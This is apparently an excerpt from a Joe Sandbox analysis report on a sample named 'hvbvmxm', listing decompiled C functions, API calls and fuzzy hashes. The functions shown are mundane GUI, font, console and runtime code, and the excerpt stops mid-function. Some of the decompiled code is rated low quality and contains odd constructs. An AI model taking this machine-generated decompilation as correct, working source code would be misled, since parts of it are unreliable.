                                                  0x00407000
                                                  0x00000000
                                                  0x00406ed2
                                                  0x00407007

                                                  APIs
                                                  • GetFocus.USER32 ref: 00406E2F
                                                  • DestroyCaret.USER32 ref: 00406E40
                                                  • DeleteObject.GDI32(?), ref: 00406E62
                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00406FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                                  • String ID: d
                                                  • API String ID: 3626877506-2564639436
                                                  • Opcode ID: b2c964a1f336987434e70822cbb2000099c62b175b4f16e4d8e5690cf225b524
                                                  • Instruction ID: f3b0e88e258c3ba16a5b386cc27445d0d3e048a8a080287da44ff0a5399481c1
                                                  • Opcode Fuzzy Hash: b2c964a1f336987434e70822cbb2000099c62b175b4f16e4d8e5690cf225b524
                                                  • Instruction Fuzzy Hash: 4F611D75900209DFCB04CF54C485BAEBBB2FF48315F19C1A9E849AB392D735EA91CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EDFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E0040EDFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x418394(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                  0x0040ee03
                                                  0x0040ee07
                                                  0x0040ee12
                                                  0x0040ee1a
                                                  0x0040ee25
                                                  0x0040ee2b
                                                  0x0040ee2f
                                                  0x0040ee36
                                                  0x0040ee3c
                                                  0x0040ee3c
                                                  0x0040ee3e
                                                  0x0040ee43
                                                  0x00000000
                                                  0x0040ee48
                                                  0x0040ee4f

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EDAF,?,?,0040ED77,?,?,?), ref: 0040EE12
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EE25
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0040EDAF,?,?,0040ED77,?,?,?), ref: 0040EE48
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: bbd30e8b8cf8a5cd47f4ceeb6b3101d77334138cccdf8063deda0b1ef6d57fbc
                                                  • Instruction ID: f9a97e0cc1c76dff18401fd2cff20c733dd3737fcdeed8b9e72a43a5dc25c969
                                                  • Opcode Fuzzy Hash: bbd30e8b8cf8a5cd47f4ceeb6b3101d77334138cccdf8063deda0b1ef6d57fbc
                                                  • Instruction Fuzzy Hash: D5F08231A0021CFBDB119B61DD0ABDE7A69EB00B55F144079E804B11A0CF748E01DAD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406910 Relevance: 7.5, APIs: 5, Instructions: 42windowclipboardCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406910(intOrPtr _a4, struct HMENU__* _a8) {
				int _v8;
				int _v12;

				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x14)) == 0) {
					_v8 = 1;
				} else {
					_v8 = 0;
				}
				EnableMenuItem(_a8, 0x111, _v8);
				if(IsClipboardFormatAvailable(0xd) == 0) {
					_v12 = 1;
				} else {
					_v12 = 0;
				}
				EnableMenuItem(_a8, 0x112, _v12);
				EnableMenuItem(_a8, 0x114, 1);
				return EnableMenuItem(_a8, 0x115, 1);
			}





                                                  0x00406923
                                                  0x0040692e
                                                  0x00406925
                                                  0x00406925
                                                  0x00406925
                                                  0x00406942
                                                  0x00406952
                                                  0x0040695d
                                                  0x00406954
                                                  0x00406954
                                                  0x00406954
                                                  0x00406971
                                                  0x00406982
                                                  0x0040699c

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnableItemMenu$AvailableClipboardFormat
                                                  • String ID:
                                                  • API String ID: 4217543366-0
                                                  • Opcode ID: 3b5aa6e1ea54b9d5e8ca5e38992b67e2cc9f60b476d73180d96e2bcaf08e59ae
                                                  • Instruction ID: d7f3310e07d9fe1f5a04116c0cd4b36c0b46aeef0aeba84d17812d40db3ce338
                                                  • Opcode Fuzzy Hash: 3b5aa6e1ea54b9d5e8ca5e38992b67e2cc9f60b476d73180d96e2bcaf08e59ae
                                                  • Instruction Fuzzy Hash: 8601487564020CFBEF04DF90DD8ABE97BB5AB44700F10C0A8FA015B2C0CBB59A54CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004038D0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E004038D0(struct HDC__** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct HDC__** _t64;
				intOrPtr _t67;

				_t64 = _a4;
				if( *((intOrPtr*)(_t64[0x21] + 8)) == 0) {
					L2:
					return _t64;
				}
				_t64 = _a4[0x21];
				if(_t64[1] != 0) {
					_t9 = _a8 + 8; // 0x54c18300
					_t11 =  *_t9 -  *_a8 + 2; // 0x54c18302
					_push( *_t9 -  *_a8 + _t11);
					_t67 = E0040DC06();
					_v16 = _t67;
					if(_v16 != 0) {
						_push(4 + ( *((intOrPtr*)(_a8 + 8)) -  *_a8) * 4);
						_v28 = E0040DC06();
						_v24 = SelectObject( *(_a4[0x21]), _a4[0x21][2]);
						_v12 =  *((intOrPtr*)(_a8 + 4));
						while(_v12 <=  *((intOrPtr*)(_a8 + 0xc))) {
							_v8 =  *_a8;
							while(_v8 <=  *((intOrPtr*)(_a8 + 8))) {
								SetBkColor( *(_a4[0x21]),  *(_a4[2] + 0x30 + (_v20 >> 0x00000004 & 0x0000000f) * 4));
								SetTextColor( *(_a4[0x21]),  *(_a4[2] + 0x30 + (_v20 & 0x0000000f) * 4));
								_v8 = _v32 - 1;
								_v8 = _v8 + 1;
							}
							_v12 = _v12 + 1;
						}
						SelectObject( *(_a4[0x21]), _v24);
						E0040DBEB(_v28);
						return E0040DBEB(_v16);
					}
					return _t67;
				}
				goto L2;
			}












                                                  0x004038d6
                                                  0x004038e3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004038e8
                                                  0x004038f2
                                                  0x004038ff
                                                  0x00403904
                                                  0x00403908
                                                  0x00403909
                                                  0x00403911
                                                  0x00403918
                                                  0x00403931
                                                  0x0040393a
                                                  0x0040395c
                                                  0x00403965
                                                  0x00403973
                                                  0x00403983
                                                  0x00403991
                                                  0x004039bc
                                                  0x004039df
                                                  0x004039eb
                                                  0x0040398e
                                                  0x0040398e
                                                  0x00403970
                                                  0x00403970
                                                  0x00403a05
                                                  0x00403a0f
                                                  0x00000000
                                                  0x00403a20
                                                  0x00000000
                                                  0x00403918
                                                  0x00000000

                                                  APIs
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00403956
                                                  • SetBkColor.GDI32(?,?), ref: 004039BC
                                                  • SetTextColor.GDI32(?,?), ref: 004039DF
                                                  • SelectObject.GDI32(?,?), ref: 00403A05
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ColorObjectSelect$Text
                                                  • String ID:
                                                  • API String ID: 2688426544-0
                                                  • Opcode ID: 5481c444f4b31c03f917671891e1c00a494a71ad5df8ccd1fa49698d10d69400
                                                  • Instruction ID: e658bcd669a8fa779878f85c121d58f6d205785bab194ac251bc5195afebe609
                                                  • Opcode Fuzzy Hash: 5481c444f4b31c03f917671891e1c00a494a71ad5df8ccd1fa49698d10d69400
                                                  • Instruction Fuzzy Hash: 7F410BB4A00109EFCB04DF58C584EAABBB5FF48314F14C2A9E9499B355D734EA81DF84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404B80 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00404B80(void* _a8) {
				void* __edi;
				int _t48;
				int _t49;
				void* _t56;

				memcpy(_a8, 0x418440, 0x10 << 2);
				E0040D210(0x418460, _a8 + 0x8c, 0, 0x40);
				 *((intOrPtr*)(_a8 + 0x48)) = 0x19;
				 *((intOrPtr*)(_a8 + 0x4c)) = 1;
				_t48 = _a8;
				 *((intOrPtr*)(_t48 + 0x84)) = 1;
				__imp__GetDpiForSystem();
				_t49 = MulDiv(0x10, _t48, 0x60);
				 *(_a8 + 0x44) = _t49;
				__imp__GetDpiForSystem();
				 *((intOrPtr*)(_a8 + 0x40)) = MulDiv(8, _t49, 0x60);
				 *((intOrPtr*)(_a8 + 0x88)) = 0x190;
				 *((intOrPtr*)(_a8 + 0x58)) = 0x32;
				 *((intOrPtr*)(_a8 + 0x5c)) = 0;
				 *((intOrPtr*)(_a8 + 0x60)) = 1;
				 *((intOrPtr*)(_a8 + 0x64)) = 0;
				 *((intOrPtr*)(_a8 + 0x54)) = 0xf5;
				 *((intOrPtr*)(_a8 + 0x68)) = 0;
				 *((intOrPtr*)(_a8 + 0x70)) = 0x96;
				 *((intOrPtr*)(_a8 + 0x6c)) = 0x50;
				 *((intOrPtr*)(_a8 + 0x50)) = 0xf;
				 *((intOrPtr*)(_a8 + 0x78)) = 0x19;
				 *((intOrPtr*)(_a8 + 0x74)) = 0x50;
				 *((short*)(_a8 + 0x7c)) = 0;
				_t56 = _a8;
				 *((short*)(_t56 + 0x7e)) = 0;
				 *((intOrPtr*)(_a8 + 0x80)) = 0;
				return _t56;
			}







                                                  0x00404b92
                                                  0x00404ba1
                                                  0x00404bac
                                                  0x00404bb6
                                                  0x00404bbd
                                                  0x00404bc0
                                                  0x00404bcc
                                                  0x00404bd5
                                                  0x00404bde
                                                  0x00404be3
                                                  0x00404bf5
                                                  0x00404bfb
                                                  0x00404c08
                                                  0x00404c12
                                                  0x00404c1c
                                                  0x00404c26
                                                  0x00404c30
                                                  0x00404c3a
                                                  0x00404c44
                                                  0x00404c4e
                                                  0x00404c58
                                                  0x00404c62
                                                  0x00404c6c
                                                  0x00404c78
                                                  0x00404c7e
                                                  0x00404c81
                                                  0x00404c88
                                                  0x00404c95

                                                  APIs
                                                  • GetDpiForSystem.USER32 ref: 00404BCC
                                                  • MulDiv.KERNEL32(00000010,00000000), ref: 00404BD5
                                                  • GetDpiForSystem.USER32 ref: 00404BE3
                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 00404BEC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: System
                                                  • String ID:
                                                  • API String ID: 3470857405-0
                                                  • Opcode ID: 897cdc8b763fd44bd7b96ab9875fb154abdd71092beed7a7b28d08a50e0c0050
                                                  • Instruction ID: f0acf98c86865db86a9f71af5c83849ed90eedc40a826ad8e7e8d7baa1f4ca9d
                                                  • Opcode Fuzzy Hash: 897cdc8b763fd44bd7b96ab9875fb154abdd71092beed7a7b28d08a50e0c0050
                                                  • Instruction Fuzzy Hash: 4B31B875600208AFE744DF55C458B9ABBA5FF48318F10C16AED288F392DBB6E945CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004086E0 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004086E0(struct HWND__* _a4, intOrPtr* _a8) {
				long _v8;
				struct HMENU__* _v12;

				_v8 =  *_a8;
				SetWindowLongW(_a4, 0, _v8);
				 *((intOrPtr*)(_v8 + 0xa8)) = _a4;
				if( *((intOrPtr*)(_v8 + 0x84)) == 0) {
					L6:
					return 0;
				}
				_v12 = GetSystemMenu(_a4, 0);
				if(_v12 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)) = CreatePopupMenu();
					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)) != 0) {
						E00403A30(_v12, 1);
						E00403A30( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)), 0);
						 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)))) = CreateCompatibleDC(0);
						goto L6;
					}
					return 0;
				}
				return 0;
			}





                                                  0x004086eb
                                                  0x004086f8
                                                  0x00408704
                                                  0x00408714
                                                  0x00408786
                                                  0x00000000
                                                  0x00408786
                                                  0x00408722
                                                  0x00408729
                                                  0x0040873e
                                                  0x0040874e
                                                  0x0040875a
                                                  0x0040876e
                                                  0x00408784
                                                  0x00000000
                                                  0x00408784
                                                  0x00000000
                                                  0x00408750
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateLongPopupSystemWindow
                                                  • String ID:
                                                  • API String ID: 3388415271-0
                                                  • Opcode ID: dca88242fddbdf48c846c268c1d76f2600cf5fbe782be4423c19be9a9e5ae3a4
                                                  • Instruction ID: 44f0d46e658bae695b86acdfcec7de6bdc6530870d40d7b7efc513e87ad21389
                                                  • Opcode Fuzzy Hash: dca88242fddbdf48c846c268c1d76f2600cf5fbe782be4423c19be9a9e5ae3a4
                                                  • Instruction Fuzzy Hash: FB213D34640208EFC704DFA4C984B9ABBF1BB48301F24C6B9E945AB391DB35AE41DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415536 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00415536(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x41fe80, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0041551F();
					E004154E1();
					_t13 = WriteConsoleW( *0x41fe80, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                  0x00415553
                                                  0x00415557
                                                  0x00415564
                                                  0x00415569
                                                  0x00415584
                                                  0x00415584
                                                  0x0041558a

                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?), ref: 0041554D
                                                  • GetLastError.KERNEL32(?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?,?,?,0041490F,00000000), ref: 00415559
                                                    • Part of subcall function 0041551F: CloseHandle.KERNEL32(FFFFFFFE,00415569,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?,?), ref: 0041552F
                                                  • ___initconout.LIBCMT ref: 00415569
                                                    • Part of subcall function 004154E1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00415510,00414F7B,?,?,004143C3,?,?,?,?), ref: 004154F4
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?), ref: 0041557E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2d8ac9ef8f63f7714d5b00175ba2915e48e71532897148875e161aace9fc90f8
                                                  • Instruction ID: f1419c9f16314b9901f95169123d81b2106f70cdfcc9624f67980f7e0c5d3866
                                                  • Opcode Fuzzy Hash: 2d8ac9ef8f63f7714d5b00175ba2915e48e71532897148875e161aace9fc90f8
                                                  • Instruction Fuzzy Hash: 8DF01C36140518BFCF222FD2DC08ACA3F67EF483A1B058025FB1885131CB328860DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D516 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040D516() {
				void* _t4;
				void* _t8;

				E0040DA18();
				E0040D9AC();
				if(E0040D729() != 0) {
					_t4 = E0040D6DB(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0040D765();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                  0x0040d516
                                                  0x0040d51b
                                                  0x0040d527
                                                  0x0040d52c
                                                  0x0040d531
                                                  0x0040d533
                                                  0x0040d53e
                                                  0x0040d535
                                                  0x0040d535
                                                  0x00000000
                                                  0x0040d535
                                                  0x0040d529
                                                  0x0040d529
                                                  0x0040d52b
                                                  0x0040d52b

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0040D516
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0040D51B
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0040D520
                                                    • Part of subcall function 0040D729: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0040D73A
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0040D535
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: af21acef9519ee4236ba89e1a403b3f3bcb15de50a8f2c9825fe419760bfa6fc
                                                  • Instruction ID: d0b2e603007e074d6a98ca05a71982cc59f5e292db5baa7813cf6e41e760b44f
                                                  • Opcode Fuzzy Hash: af21acef9519ee4236ba89e1a403b3f3bcb15de50a8f2c9825fe419760bfa6fc
                                                  • Instruction Fuzzy Hash: 46C00268D4420160DC103AF63A021BE131008933CCB9024BBEC41376C3993E040E6D6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406790(void* __edi, intOrPtr _a4, char _a8) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _v20;
				void* _v24;
				struct tagLOGFONTW _v116;

				E0040D210(__edi,  &_v116, 0, 0x5c);
				_v116.lfCharSet = 1;
				_v116.lfPitchAndFamily = 0x31;
				_v24 = _a4;
				_t6 =  &_a8; // 0x404928
				_v16 =  *((intOrPtr*)( *_t6 + 0x44));
				_t9 =  &_a8; // 0x404928
				_v12 =  *((intOrPtr*)( *_t9 + 0x40));
				_v8 = 0;
				_v20 = 0;
				while(_v20 <= 5) {
					EnumFontFamiliesExW( *( *(_a4 + 0x84)),  &_v116, E00403550,  &_v24, 0);
					if(_v8 == 0) {
						_v20 = _v20 + 1;
						continue;
					} else {
					}
					break;
				}
				_t25 =  &_a8; // 0x404928
				 *((intOrPtr*)( *_t25 + 0x40)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x80));
				_t30 =  &_a8; // 0x404928
				 *((intOrPtr*)( *_t30 + 0x44)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x82));
				_t35 =  &_a8; // 0x404928
				 *((intOrPtr*)( *_t35 + 0x84)) =  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x86));
				_t43 =  &_a8; // 0x404928
				E0040CC90( *_t43 + 0x8c,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) + 0x88)),  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) << 1);
				_t47 =  &_a8; // 0x404928
				 *((short*)( *_t47 + 0x8c +  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) * 2)) = 0;
				_t51 =  &_a8; // 0x404928
				return E00405CF0(0,  *_t51);
			}









                                                  0x0040679e
                                                  0x004067a6
                                                  0x004067aa
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067ba
                                                  0x004067bd
                                                  0x004067c3
                                                  0x004067c6
                                                  0x004067cd
                                                  0x004067df
                                                  0x00406800
                                                  0x0040680a
                                                  0x004067dc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680c
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040681d
                                                  0x00406820
                                                  0x00406830
                                                  0x00406833
                                                  0x00406843
                                                  0x00406846
                                                  0x00406868
                                                  0x00406871
                                                  0x00406887
                                                  0x0040688a
                                                  0x00406892
                                                  0x004068a0

                                                  APIs
                                                  • EnumFontFamiliesExW.GDI32(?,?,Function_00003550,?,00000000), ref: 00406800
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnumFamiliesFont
                                                  • String ID: (I@$1
                                                  • API String ID: 2229041460-19130419
                                                  • Opcode ID: 512abf597975d532bad3b19b9d7508a8e3a11f246e487422d4e14e93115da64e
                                                  • Instruction ID: 8981e6ccffa7fcf40342c6634695e992f66a12565622c359e3784dbe14f92210
                                                  • Opcode Fuzzy Hash: 512abf597975d532bad3b19b9d7508a8e3a11f246e487422d4e14e93115da64e
                                                  • Instruction Fuzzy Hash: C7411934600208EBDB04DF58C484FAAB7B5FF48314F14C16AEC499F392D775AA81CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004074C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E004074C0(void* __ecx, intOrPtr _a4, void* _a8, long _a12) {
				DWORD* _v8;
				intOrPtr _t32;
				int _t35;
				long _t36;
				intOrPtr _t40;

				if(_a12 == 0) {
					L2:
					return _t32;
				}
				_t32 = _a4;
				if( *((intOrPtr*)(_t32 + 0xb4)) == 0) {
					goto L2;
				}
				if( *((intOrPtr*)(_a4 + 0x10b8)) + _a12 > 0x1000) {
					E00407060(_a4);
				}
				if( *((intOrPtr*)(_a4 + 0x10b8)) + _a12 <= 0x1000) {
					_t17 =  *((intOrPtr*)(_a4 + 0x10b8)) + 0xb8; // 0xb8
					E0040CC90(_a4 + _t17, _a8, _a12);
					_t40 = _a4;
					 *((intOrPtr*)(_a4 + 0x10b8)) =  *((intOrPtr*)(_t40 + 0x10b8)) + _a12;
					return _t40;
				}
				if( *((intOrPtr*)(_a4 + 0x10b8)) != 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				0x400000(_v8);
				_t35 = WriteFile( *(_a4 + 0xb4), _a8, _a12, 0, 0);
				if(_t35 == 0) {
